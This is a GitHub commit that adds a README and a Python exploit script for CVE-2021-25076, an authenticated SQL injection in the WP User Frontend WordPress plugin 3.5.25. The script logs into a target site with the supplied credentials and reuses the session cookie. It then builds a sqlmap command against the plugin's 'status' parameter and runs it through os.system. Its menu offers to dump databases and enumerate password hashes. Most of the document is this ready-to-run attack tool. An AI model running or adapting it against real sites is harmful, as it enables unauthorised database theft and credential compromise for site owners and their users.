add WordPress_Plugin_v3.5.25 exp

zxcv0221 · Feb 21, 2022 · 47e0d30 · 47e0d30
1 parent 46aec79
commit 47e0d30
Show file tree

Hide file tree

Showing 2 changed files with 122 additions and 0 deletions.
diff --git a/CMS/WordPress/WordPress_Plugin_v3.5.25/README.md b/CMS/WordPress/WordPress_Plugin_v3.5.25/README.md
@@ -0,0 +1,12 @@
+# WordPress Plugin WP User Frontend 3.5.25 - SQLi (Authenticated)
+## From
+* WordPress Plugin<= 3.5.25 SQL Injection 
+* CVE: CVE-2021-25076
+
+### Description
+
+The WP User Frontend WordPress plugin before 3.5.26 does not validate and escape the status parameter
+
+before using it in a SQL statement in the Subscribers dashboard, leading to an SQL injection.
+
+Due to the lack of sanitisation and escaping, this could also lead to Reflected Cross-Site Scripting
diff --git a/CMS/WordPress/WordPress_Plugin_v3.5.25/exp.py b/CMS/WordPress/WordPress_Plugin_v3.5.25/exp.py
@@ -0,0 +1,110 @@
+# Exploit Title: WordPress Plugin WP User Frontend 3.5.25 - SQLi (Authenticated)
+# Date 20.02.2022
+# Exploit Author: Ron Jost (Hacker5preme)
+# Vendor Homepage: https://wedevs.com/
+# Software Link: https://downloads.wordpress.org/plugin/wp-user-frontend.3.5.25.zip
+# Version: < 3.5.25
+# Tested on: Ubuntu 20.04
+# CVE: CVE-2021-25076
+# CWE: CWE-89
+# Documentation: https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-25076/README.md
+
+'''
+Description:
+The WP User Frontend WordPress plugin before 3.5.26 does not validate and escape the status parameter
+before using it in a SQL statement in the Subscribers dashboard, leading to an SQL injection.
+Due to the lack of sanitisation and escaping, this could also lead to Reflected Cross-Site Scripting
+'''
+
+banner = '''
+
+ _|_|_|  _|      _|  _|_|_|_|              _|_|      _|      _|_|      _|                _|_|    _|_|_|_|    _|    _|_|_|_|_|    _|_|_|  
+_|        _|      _|  _|                  _|    _|  _|  _|  _|    _|  _|_|              _|    _|  _|        _|  _|          _|  _|        
+_|        _|      _|  _|_|_|  _|_|_|_|_|      _|    _|  _|      _|      _|  _|_|_|_|_|      _|    _|_|_|    _|  _|        _|    _|_|_|    
+_|          _|  _|    _|                    _|      _|  _|    _|        _|                _|            _|  _|  _|      _|      _|    _|  
+  _|_|_|      _|      _|_|_|_|            _|_|_|_|    _|    _|_|_|_|    _|              _|_|_|_|  _|_|_|      _|      _|          _|_|    
+                                                                                                                                          
+										[+] WP User Frontend - SQL Injection
+										[@] Developed by Ron Jost (Hacker5preme)
+'''
+print(banner)
+
+import argparse
+from datetime import datetime
+import os
+import requests
+import json
+
+# User-Input:
+my_parser = argparse.ArgumentParser(description= 'WP User Frontend - SQL-Injection (Authenticated)')
+my_parser.add_argument('-T', '--IP', type=str)
+my_parser.add_argument('-P', '--PORT', type=str)
+my_parser.add_argument('-U', '--PATH', type=str)
+my_parser.add_argument('-u', '--USERNAME', type=str)
+my_parser.add_argument('-p', '--PASSWORD', type=str)
+args = my_parser.parse_args()
+target_ip = args.IP
+target_port = args.PORT
+wp_path = args.PATH
+username = args.USERNAME
+password = args.PASSWORD
+
+
+
+print('[*] Starting Exploit at: ' + str(datetime.now().strftime('%H:%M:%S')))
+
+# Authentication:
+session = requests.Session()
+auth_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-login.php'
+check = session.get(auth_url)
+# Header:
+header = {
+    'Host': target_ip,
+    'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0',
+    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
+    'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',
+    'Accept-Encoding': 'gzip, deflate',
+    'Content-Type': 'application/x-www-form-urlencoded',
+    'Origin': 'http://' + target_ip,
+    'Connection': 'close',
+    'Upgrade-Insecure-Requests': '1'
+}
+
+# Body:
+body = {
+    'log': username,
+    'pwd': password,
+    'wp-submit': 'Log In',
+    'testcookie': '1'
+}
+auth = session.post(auth_url, headers=header, data=body)
+
+# SQL-Injection (Exploit):
+# Generate payload for sqlmap
+cookies_session = session.cookies.get_dict()
+cookie = json.dumps(cookies_session)
+cookie = cookie.replace('"}','')
+cookie = cookie.replace('{"', '')
+cookie = cookie.replace('"', '')
+cookie = cookie.replace(" ", '')
+cookie = cookie.replace(":", '=')
+cookie = cookie.replace(',', '; ')
+print('[*] Payload for SQL-Injection:')
+exploitcode_url = r'sqlmap -u "http://' + target_ip + ':' + target_port + wp_path + r'wp-admin/admin.php?page=wpuf_subscribers&post_ID=1&status=1" '
+exploitcode_risk = '--level 2 --risk 2 '
+exploitcode_cookie = '--cookie="' + cookie + '" '
+print('    Sqlmap options:')
+print('     -a, --all           Retrieve everything')
+print('     -b, --banner        Retrieve DBMS banner')
+print('     --current-user      Retrieve DBMS current user')
+print('     --current-db        Retrieve DBMS current database')
+print('     --passwords         Enumerate DBMS users password hashes')
+print('     --tables            Enumerate DBMS database tables')
+print('     --columns           Enumerate DBMS database table column')
+print('     --schema            Enumerate DBMS schema')
+print('     --dump              Dump DBMS database table entries')
+print('     --dump-all          Dump all DBMS databases tables entries')
+retrieve_mode = input('Which sqlmap option should be used to retrieve your information? ')
+exploitcode = exploitcode_url + exploitcode_risk + exploitcode_cookie + retrieve_mode + ' -p status -v 0 --answers="follow=Y" --batch'
+os.system(exploitcode)
+print('Exploit finished at: ' + str(datetime.now().strftime('%H:%M:%S')))